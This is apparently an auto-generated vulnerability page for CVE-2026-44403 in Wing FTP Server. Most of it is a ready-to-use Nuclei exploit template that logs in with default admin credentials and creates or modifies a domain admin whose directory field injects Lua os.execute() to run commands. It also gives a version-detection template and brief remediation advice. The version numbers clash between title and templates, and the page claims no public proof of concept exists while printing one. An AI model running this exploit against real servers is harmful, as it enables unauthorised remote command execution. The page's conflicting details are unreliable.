[remote] Wing FTP Server 8.1.3 - Authenticated Remote Code Execution
CVE-2026-44403
Vulnerability
High · CVSS N/A

📋 Basic vulnerability information

| CVE | CVE-2026-44403 |
|---|---|
| Vulnerability type | Vulnerability |
| Affected versions | See the original advisory |
| Severity | High · CVSS N/A |
| Published | 2026-05-29 |
| Submitter | Ünsal Furkan Harani |
| Source | Exploit-DB original ↗ |
⚔️ Nuclei Exploit template

The following is an exploitation template in standard Nuclei v3 format that can be used directly for vulnerability verification:
```yaml
id: CVE-2026-44403-exploit

info:
  name: Wing FTP Server 8.1.2 - Authenticated Remote Code Execution
  author: your-username
  severity: critical
  description: Exploits CVE-2026-44403 to execute arbitrary commands via Lua injection in domain admin basefolder field
  reference:
    - https://www.wftpserver.com/
    - https://www.wftpserver.com/download.htm
  tags: cve,cve2026,wingftp,rce,authenticated,exploit

variables:
  username: 'admin'
  password: 'admin'
  cmdid: 'id'
  poisonadminuser: 'eviladmin'
  poisonadminpass: 'evilpass'

http:
  - raw:
      - |
        POST /service_login.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/admin_login.html
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        POST /service_add_admin.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/main.html
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz

        ------WebKitFormBoundaryxyz
        Content-Disposition: form-data; name="admin"

        {"username":"{{poisonadminuser}}","password":"{{poisonadminpass}}","readonly":false,"domainadmin":1,"domainlist":"","mydirectory":"/tmp/x]]os.execute('{{cmdid}} > /tmp/out.txt')--","ipmasks":[],"enable_two_factor":false,"two_factor_code":""}
        ------WebKitFormBoundaryxyz--
      - |
        POST /service_login.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/admin_login.html
        Content-Type: application/x-www-form-urlencoded

        username={{poisonadminuser}}&password={{poisonadminpass}}
      - |
        GET /main.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body_4, 'logged in ok') || contains(body_4, 'main.html')"

    extractors:
      - type: regex
        name: session_cookie
        part: header
        regex:
          - 'UIDADMIN=[^;]+'
        group: 1
        internal: true

    cookie-reuse: true
    redirects: false

  - raw:
      - |
        POST /service_login.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/admin_login.html
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        POST /service_modify_admin.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/main.html
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz

        ------WebKitFormBoundaryxyz
        Content-Disposition: form-data; name="admin"

        {"username":"{{poisonadminuser}}","password":"{{poisonadminpass}}","readonly":false,"domainadmin":1,"domainlist":"","mydirectory":"/tmp/x]]os.execute('{{cmdid}} > /tmp/out.txt')--","ipmasks":[],"enable_two_factor":false,"two_factor_code":""}
        ------WebKitFormBoundaryxyz
        Content-Disposition: form-data; name="oldname"

        {{poisonadminuser}}
        ------WebKitFormBoundaryxyz--
      - |
        POST /service_login.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/admin_login.html
        Content-Type: application/x-www-form-urlencoded

        username={{poisonadminuser}}&password={{poisonadminpass}}
      - |
        GET /main.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'code\":0') || contains(body_1, 'logged in ok')"
          - "contains(body_2, 'code\":0')"
          - "contains(body_3, 'code\":0') || contains(body_3, 'logged in ok')"
        condition: and

    cookie-reuse: true
    redirects: false
```

🔍 Nuclei Detection template
The following is a detection template used to determine whether a target is affected:
```yaml
id: CVE-2026-44403-detection

info:
  name: Wing FTP Server 8.1.2 - Version Detection
  author: your-username
  severity: medium
  description: Detects Wing FTP Server version <= 8.1.2 which is vulnerable to CVE-2026-44403
  tags: cve,cve2026,wingftp,rce,authenticated

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
      - "{{BaseURL}}/favicon.ico"
      - "{{BaseURL}}/admin_login.html"

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "Wing FTP Server"
        part: body
      - type: word
        words:
          - "wingftp"
        part: body

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'Wing FTP Server v?(\d+\.\d+\.\d+)'
          - 'v?(\d+\.\d+\.\d+).*Wing FTP'

  - method: GET
    path:
      - "{{BaseURL}}/version.txt"
      - "{{BaseURL}}/admin/version.txt"
      - "{{BaseURL}}/wingftp_version"

    matchers:
      - type: word
        words:
          - "Wing FTP Server"
        part: body

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'Wing FTP Server v?(\d+\.\d+\.\d+)'
          - 'v?(\d+\.\d+\.\d+)'
```

🛡️ Remediation advice
Upgrade to the vendor's latest security release.
🚨 Threat assessment

| Indicator | Status |
|---|---|
| 📈 EPSS exploitation probability | No data available |
| 🚨 CISA KEV | No known exploitation |
| 🔧 Public PoC | No public PoC available |
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-06-01 08:08 | Source: Exploit-DB